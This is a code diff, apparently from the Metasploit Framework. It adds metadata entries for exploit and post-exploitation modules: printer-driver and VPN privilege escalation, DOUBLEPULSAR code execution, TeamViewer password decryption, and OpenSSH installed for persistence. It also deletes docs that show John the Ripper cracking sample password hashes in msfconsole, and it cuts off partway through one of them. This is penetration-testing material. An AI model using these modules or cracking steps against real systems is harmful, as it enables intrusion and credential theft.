      "PCW_BTLINDV1.0.0B04 (WinXP SP3, Win7 SP1)"
    ],
-    "mod_time": "2018-11-16 12:18:28 +0000",
+    "mod_time": "2020-02-04 10:05:41 +0000",
    "path": "/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/beetel_netconfig_ini_bof",
@@ -129894,6 +129764,57 @@
    },
    "needs_cleanup": null
  },
+  "exploit_windows/local/ricoh_driver_privesc": {
+    "name": "Ricoh Driver Privilege Escalation",
+    "fullname": "exploit/windows/local/ricoh_driver_privesc",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2020-01-22",
+    "type": "exploit",
+    "author": [
+      "Alexander Pudwill",
+      "Pentagrid AG",
+      "Shelby Pace"
+    ],
+    "description": "Various Ricoh printer drivers allow escalation of\n        privileges on Windows systems.\n\n        For vulnerable drivers, a low-privileged user can\n        read/write files within the `RICOH_DRV` directory\n        and its subdirectories.\n\n        `PrintIsolationHost.exe`, a Windows process running\n        as NT AUTHORITY\\SYSTEM, loads driver-specific DLLs\n        during the installation of a printer. A user can\n        elevate to SYSTEM by writing a malicious DLL to\n        the vulnerable driver directory and adding a new\n        printer with a vulnerable driver.\n\n        This module leverages the `prnmngr.vbs` script\n        to add and delete printers. Multiple runs of this\n        module may be required given successful exploitation\n        is time-sensitive.",
+    "references": [
+      "CVE-2019-19363",
+      "URL-https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/"
+    ],
+    "platform": "Windows",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows"
+    ],
+    "mod_time": "2020-02-06 14:11:42 +0000",
+    "path": "/modules/exploits/windows/local/ricoh_driver_privesc.rb",
+    "is_install_path": true,
+    "ref_name": "windows/local/ricoh_driver_privesc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "SideEffects": [
+        "artifacts-on-disk"
+      ],
+      "Reliability": [
+        "unreliable-session"
+      ],
+      "Stability": [
+        "service-resource-loss"
+      ]
+    },
+    "needs_cleanup": true
+  },
  "exploit_windows/local/run_as": {
    "name": "Windows Run Command As User",
    "fullname": "exploit/windows/local/run_as",
@@ -130221,6 +130142,54 @@
    },
    "needs_cleanup": true
  },
+  "exploit_windows/local/windscribe_windscribeservice_priv_esc": {
+    "name": "Windscribe WindscribeService Named Pipe Privilege Escalation",
+    "fullname": "exploit/windows/local/windscribe_windscribeservice_priv_esc",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2018-05-24",
+    "type": "exploit",
+    "author": [
+      "Emin Ghuliev",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "The Windscribe VPN client application for Windows makes use of a\n        Windows service `WindscribeService.exe` which exposes a named pipe\n        `\\.\\pipe\\WindscribeService` allowing execution of programs with\n        elevated privileges.\n\n        Windscribe versions prior to 1.82 do not validate user-supplied\n        program names, allowing execution of arbitrary commands as SYSTEM.\n\n        This module has been tested successfully on Windscribe versions\n        1.80 and 1.81 on Windows 7 SP1 (x64).",
+    "references": [
+      "CVE-2018-11479",
+      "URL-http://blog.emingh.com/2018/05/windscribe-vpn-privilege-escalation.html",
+      "URL-https://pastebin.com/eLG3dpYK"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2020-02-01 00:41:07 +0000",
+    "path": "/modules/exploits/windows/local/windscribe_windscribeservice_priv_esc.rb",
+    "is_install_path": true,
+    "ref_name": "windows/local/windscribe_windscribeservice_priv_esc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ]
+    },
+    "needs_cleanup": true
+  },
  "exploit_windows/local/wmi": {
    "name": "Windows Management Instrumentation (WMI) Remote Command Execution",
    "fullname": "exploit/windows/local/wmi",
@@ -131923,6 +131892,50 @@
    },
    "needs_cleanup": null
  },
+  "exploit_windows/misc/crosschex_device_bof": {
+    "name": "Anviz CrossChex Buffer Overflow",
+    "fullname": "exploit/windows/misc/crosschex_device_bof",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-11-28",
+    "type": "exploit",
+    "author": [
+      "Luis Catarino <lcatarino@protonmail.com>",
+      "Pedro Rodrigues <pedrosousarodrigues@protonmail.com>",
+      "agalway-r7",
+      "adfoster-r7"
+    ],
+    "description": "Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast,\n        triggering a stack buffer overflow.",
+    "references": [
+      "CVE-2019-12518",
+      "URL-https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html",
+      "EDB-47734"
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Crosschex Standard x86 <= V4.3.12"
+    ],
+    "mod_time": "2020-02-13 14:17:23 +0000",
+    "path": "/modules/exploits/windows/misc/crosschex_device_bof.rb",
+    "is_install_path": true,
+    "ref_name": "windows/misc/crosschex_device_bof",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_windows/misc/disk_savvy_adm": {
    "name": "Disk Savvy Enterprise v10.4.18",
    "fullname": "exploit/windows/misc/disk_savvy_adm",
@@ -137139,6 +137152,63 @@
    },
    "needs_cleanup": null
  },
+  "exploit_windows/rdp/rdp_doublepulsar_rce": {
+    "name": "RDP DOUBLEPULSAR Remote Code Execution",
+    "fullname": "exploit/windows/rdp/rdp_doublepulsar_rce",
+    "aliases": [
+
+    ],
+    "rank": 500,
+    "disclosure_date": "2017-04-14",
+    "type": "exploit",
+    "author": [
+      "Equation Group",
+      "Shadow Brokers",
+      "Luke Jennings",
+      "wvu <wvu@metasploit.com>",
+      "Tom Sellers",
+      "Spencer McIntyre"
+    ],
+    "description": "This module executes a Metasploit payload against the Equation Group's\n        DOUBLEPULSAR implant for RDP.\n\n        While this module primarily performs code execution against the implant,\n        the \"Neutralize implant\" target allows you to disable the implant.",
+    "references": [
+      "URL-https://github.com/countercept/doublepulsar-detection-script"
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": 3389,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Execute payload (x64)",
+      "Neutralize implant"
+    ],
+    "mod_time": "2020-01-29 13:16:02 +0000",
+    "path": "/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/rdp/rdp_doublepulsar_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "AKA": [
+        "DOUBLEPULSAR"
+      ],
+      "RelatedModules": [
+        "exploit/windows/smb/smb_doublepulsar_rce"
+      ],
+      "Stability": [
+        "crash-os-down"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_windows/scada/abb_wserver_exec": {
    "name": "ABB MicroSCADA wserver.exe Remote Code Execution",
    "fullname": "exploit/windows/scada/abb_wserver_exec",
@@ -138780,78 +138850,6 @@
    },
    "needs_cleanup": null
  },
-  "exploit_windows/smb/doublepulsar_rce": {
-    "name": "DOUBLEPULSAR Payload Execution and Neutralization",
-    "fullname": "exploit/windows/smb/doublepulsar_rce",
-    "aliases": [
-
-    ],
-    "rank": 500,
-    "disclosure_date": "2017-04-14",
-    "type": "exploit",
-    "author": [
-      "Equation Group",
-      "Shadow Brokers",
-      "zerosum0x0",
-      "Luke Jennings",
-      "wvu <wvu@metasploit.com>",
-      "Jacob Robles"
-    ],
-    "description": "This module executes a Metasploit payload against the Equation Group's\n        DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n        While this module primarily performs code execution against the implant,\n        the \"Neutralize implant\" target allows you to disable the implant.",
-    "references": [
-      "MSB-MS17-010",
-      "CVE-2017-0143",
-      "CVE-2017-0144",
-      "CVE-2017-0145",
-      "CVE-2017-0146",
-      "CVE-2017-0147",
-      "CVE-2017-0148",
-      "URL-https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html",
-      "URL-https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/",
-      "URL-https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/",
-      "URL-https://github.com/countercept/doublepulsar-detection-script",
-      "URL-https://github.com/countercept/doublepulsar-c2-traffic-decryptor",
-      "URL-https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1"
-    ],
-    "platform": "Windows",
-    "arch": "x64",
-    "rport": 445,
-    "autofilter_ports": [
-      139,
-      445
-    ],
-    "autofilter_services": [
-      "netbios-ssn",
-      "microsoft-ds"
-    ],
-    "targets": [
-      "Execute payload",
-      "Neutralize implant"
-    ],
-    "mod_time": "2020-01-22 16:37:36 +0000",
-    "path": "/modules/exploits/windows/smb/doublepulsar_rce.rb",
-    "is_install_path": true,
-    "ref_name": "windows/smb/doublepulsar_rce",
-    "check": true,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-      "AKA": [
-        "DOUBLEPULSAR"
-      ],
-      "RelatedModules": [
-        "auxiliary/scanner/smb/smb_ms17_010",
-        "exploit/windows/smb/ms17_010_eternalblue"
-      ],
-      "Stability": [
-        "crash-os-down"
-      ],
-      "Reliability": [
-        "repeatable-session"
-      ]
-    },
-    "needs_cleanup": null
-  },
  "exploit_windows/smb/generic_smb_dll_injection": {
    "name": "Generic DLL Injection From Shared Resource",
    "fullname": "exploit/windows/smb/generic_smb_dll_injection",
@@ -140205,6 +140203,78 @@
    },
    "needs_cleanup": null
  },
+  "exploit_windows/smb/smb_doublepulsar_rce": {
+    "name": "SMB DOUBLEPULSAR Remote Code Execution",
+    "fullname": "exploit/windows/smb/smb_doublepulsar_rce",
+    "aliases": [
+      "exploit/windows/smb/doublepulsar_rce"
+    ],
+    "rank": 500,
+    "disclosure_date": "2017-04-14",
+    "type": "exploit",
+    "author": [
+      "Equation Group",
+      "Shadow Brokers",
+      "zerosum0x0",
+      "Luke Jennings",
+      "wvu <wvu@metasploit.com>",
+      "Jacob Robles"
+    ],
+    "description": "This module executes a Metasploit payload against the Equation Group's\n        DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n        While this module primarily performs code execution against the implant,\n        the \"Neutralize implant\" target allows you to disable the implant.",
+    "references": [
+      "MSB-MS17-010",
+      "CVE-2017-0143",
+      "CVE-2017-0144",
+      "CVE-2017-0145",
+      "CVE-2017-0146",
+      "CVE-2017-0147",
+      "CVE-2017-0148",
+      "URL-https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html",
+      "URL-https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/",
+      "URL-https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/",
+      "URL-https://github.com/countercept/doublepulsar-detection-script",
+      "URL-https://github.com/countercept/doublepulsar-c2-traffic-decryptor",
+      "URL-https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1"
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": 445,
+    "autofilter_ports": [
+      139,
+      445
+    ],
+    "autofilter_services": [
+      "netbios-ssn",
+      "microsoft-ds"
+    ],
+    "targets": [
+      "Execute payload (x64)",
+      "Neutralize implant"
+    ],
+    "mod_time": "2020-02-03 11:19:20 +0000",
+    "path": "/modules/exploits/windows/smb/smb_doublepulsar_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/smb/smb_doublepulsar_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "AKA": [
+        "DOUBLEPULSAR"
+      ],
+      "RelatedModules": [
+        "auxiliary/scanner/smb/smb_ms17_010",
+        "exploit/windows/smb/ms17_010_eternalblue"
+      ],
+      "Stability": [
+        "crash-os-down"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_windows/smb/smb_relay": {
    "name": "MS08-068 Microsoft Windows SMB Relay Code Execution",
    "fullname": "exploit/windows/smb/smb_relay",
@@ -168389,6 +168459,40 @@
    },
    "needs_cleanup": null
  },
+  "post_windows/gather/credentials/teamviewer_passwords": {
+    "name": "Windows Gather TeamViewer Passwords",
+    "fullname": "post/windows/gather/credentials/teamviewer_passwords",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Nic Losby <blurbdust@gmail.com>"
+    ],
+    "description": "This module will find and decrypt stored TeamViewer passwords",
+    "references": [
+      "CVE-2019-18988",
+      "URL-https://whynotsecurity.com/blog/teamviewer/"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-02-07 10:07:41 +0000",
+    "path": "/modules/post/windows/gather/credentials/teamviewer_passwords.rb",
+    "is_install_path": true,
+    "ref_name": "windows/gather/credentials/teamviewer_passwords",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "post_windows/gather/credentials/tortoisesvn": {
    "name": "Windows Gather TortoiseSVN Saved Password Extraction",
    "fullname": "post/windows/gather/credentials/tortoisesvn",
@@ -171461,6 +171565,40 @@
    },
    "needs_cleanup": null
  },
+  "post_windows/manage/install_ssh": {
+    "name": "Install OpenSSH for Windows",
+    "fullname": "post/windows/manage/install_ssh",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "Michael Long <bluesentinel@protonmail.com>"
+    ],
+    "description": "This module installs OpenSSH server and client for Windows using PowerShell.\n                        SSH on Windows can provide pentesters persistent access to a secure interactive terminal, interactive filesystem access, and port forwarding over SSH.",
+    "references": [
+      "URL-https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_overview",
+      "URL-https://github.com/PowerShell/openssh-portable"
+    ],
+    "platform": "Windows",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-01-19 19:51:44 +0000",
+    "path": "/modules/post/windows/manage/install_ssh.rb",
+    "is_install_path": true,
+    "ref_name": "windows/manage/install_ssh",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "post_windows/manage/killav": {
    "name": "Windows Post Kill Antivirus and Hips",
    "fullname": "post/windows/manage/killav",
@@ -1,141 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode AIX 
-  based password hashes, such as:
-
-  * `DES` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-## Verification Steps
-
-  1. Have at least one user with a `des` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_aix```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:des_password hash:rEK1ecacw.7.c jtr:des
-creds add user:des_passphrase hash:qiyh4XPJGsOZ2MEAyLkfWqeQ jtr:des
-```
-
-Crack them:
-
-```
-[*] Hashes Written out to /tmp/hashes_tmp20190211-5021-1p3x0lx
-[*] Wordlist file written out to /tmp/jtrtmp20190211-5021-66w3u0
-[*] Cracking descrypt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-Will run 8 OpenMP threads
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:00 DONE (2019-02-11 19:29) 0g/s 4206Kp/s 4206Kc/s 4206KC/s scandal..vagrant
-Session completed
-[*] Cracking descrypt hashes in single mode...
-Using default input encoding: UTF-8
-Will run 8 OpenMP threads
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:05 DONE (2019-02-11 19:29) 0g/s 6681Kp/s 6681Kc/s 6681KC/s qt1902..tude1900
-Session completed
-[*] Cracking descrypt hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-Will run 8 OpenMP threads
-Warning: MaxLen = 20 is too large for the current hash type, reduced to 8
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:05 DONE (2019-02-11 19:29) 0g/s 21083Kp/s 21083Kc/s 21083KC/s 73602400..73673952
-Session completed
-[*] Cracked Passwords this run:
-[+] des_password:password
-[+] des_passphrase:????????se
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_aix) > creds
-Credentials
-===========
-
-host  origin  service  public          private                   realm  private_type        JtR Format
----  ------  -------  ------          -------                   -----  ------------        ----------
-                       des_passphrase  ????????se                       Password            
-                       des_passphrase  qiyh4XPJGsOZ2MEAyLkfWqeQ         Nonreplayable hash  des
-                       des_password    rEK1ecacw.7.c                    Nonreplayable hash  des
-                       des_password    password                         Password            
-
-```
@@ -1,176 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode Linux
-  based password hashes, such as:
-
-  * `DES` based passwords
-  * `MD5` based passwords
-  * `BSDi` based passwords
-  * With `crypt` set to `true`:
-    * `bf`, `bcrypt`, or `blowfish` based passwords
-    * `SHA256` based passwords
-    * `SHA512` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-  The definition of `crypt` according to JTR and waht algorithms it decodes can be found
-  [here](https://github.com/magnumripper/JohnTheRipper/blob/ae24a410baac45bb36884d793c429adeb7197336/src/c3_fmt.c#L731)
-
-## Verification Steps
-
-  1. Have at least one user with an `des`, `md5`, `bsdi`, `crypt`, `blowfish`, `sha512`, or `sha256` password hash in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_linux```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CRYPT**
-
-   Include `blowfish` and `SHA`(256/512) passwords.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:des_password hash:rEK1ecacw.7.c jtr:des
-creds add user:md5_password hash:$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/ jtr:md5
-creds add user:bsdi_password hash:_J9..K0AyUubDrfOgO4s jtr:bsdi
-creds add user:sha256_password hash:$5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5 jtr:sha256,crypt
-creds add user:sha512_password hash:$6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1 jtr:sha512,crypt
-creds add user:blowfish_password hash:$2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe jtr:bf
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_linux 
-msf5 auxiliary(analyze/jtr_linux) > set crypt true
-crypt => true
-msf5 auxiliary(analyze/jtr_linux) > run
-
-[*] Hashes Written out to /tmp/hashes_tmp20190211-5021-hqwf2h
-[*] Wordlist file written out to /tmp/jtrtmp20190211-5021-1ixz59k
-[*] Cracking md5crypt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] md5_password:password
-[*] Cracking descrypt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] des_password:password
-[*] Cracking bsdicrypt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] bsdi_password:password
-[*] Cracking crypt hashes in normal wordlist mode...
-Warning: hash encoding string length 20, type id #4
-appears to be unsupported on this system; will not load such hashes.
-Warning: hash encoding string length 60, type id $2
-appears to be unsupported on this system; will not load such hashes.
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] des_password:password
-[+] md5_password:password
-[+] sha256_password:password
-[+] sha512_password:password
-[*] Cracking bcrypt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] blowfish_password:password
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_linux) > creds
-Credentials
-===========
-
-host  origin  service  public             private                                                                                             realm  private_type        JtR Format
----  ------  -------  ------             -------                                                                                             -----  ------------        ----------
-                       bsdi_password      password                                                                                                   Password            
-                       des_password       password                                                                                                   Password            
-                       sha256_password    $5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5                                                    Nonreplayable hash  sha256,crypt
-                       md5_password       password                                                                                                   Password            
-                       md5_password       $1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/                                                                         Nonreplayable hash  md5
-                       bsdi_password      _J9..K0AyUubDrfOgO4s                                                                                       Nonreplayable hash  bsdi
-                       sha512_password    password                                                                                                   Password            
-                       blowfish_password  $2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe                                               Nonreplayable hash  bf
-                       sha512_password    $6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1         Nonreplayable hash  sha512,crypt
-                       sha256_password    password                                                                                                   Password            
-                       des_password       rEK1ecacw.7.c                                                                                              Nonreplayable hash  des
-                       blowfish_password  password                                                                                                   Password            
-
-```
@@ -1,157 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode Microsoft
-  SQL based password hashes, such as:
-
-  * `mssql` based passwords
-  * `mssql05` based passwords
-  * `mssql12` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-## Verification Steps
-
-  1. Have at least one user with an `mssql`, `mssql05` or `mssql12` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_mssql_fast```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:mssql05_toto hash:0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908 jtr:mssql05
-creds add user:mssql_foo hash:0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254 jtr:mssql
-creds add user:mssql12_Password1! hash:0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16 jtr:mssql12 
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_mssql_fast 
-msf5 auxiliary(analyze/jtr_mssql_fast) > run
-
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-u353o8
-[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-hcwr36
-[*] Cracking mssql05 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql05 hashes in single mode...
-Using default input encoding: UTF-8
